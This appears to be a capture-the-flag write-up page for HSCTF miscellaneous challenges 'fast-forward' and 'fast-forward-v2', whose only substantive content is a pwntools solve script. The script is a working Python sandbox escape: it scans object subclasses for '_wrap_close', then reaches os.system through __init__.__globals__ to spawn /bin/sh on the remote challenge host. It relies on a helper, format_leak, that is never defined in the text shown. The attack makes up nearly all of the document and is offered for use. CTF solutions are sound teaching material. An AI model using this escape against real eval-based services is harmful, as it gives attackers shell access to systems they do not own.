Misc
Challenge
Link
fast-forward (26 solves)
Description
Solution


fast-forward-v2 (22 solves)
Description
Solution

Last updated



Last updated
from pwn import *
def send(data):
r.recvuntil(b'> ')
r.sendline(data)
return r.recvline()
def exploit():
payload = "print('_wrap_close' in (lambda: str((1).__class__.__base__.__subclasses__()[{}]))())"
for i in range(0xff):
resp = send(format_leak(payload.format(i)))
print(i, resp)
if(resp.strip() == b'True'):
break
payload = f"(lambda: print((1).__class__.__base__.__subclasses__()[{i}].__init__.__globals__['system']('/bin/sh')))()"
r.recvuntil(b'> ')
r.sendline(payload.encode())
r = remote("fast-forward.hsctf.com", 1337)
exploit()
r.interactive()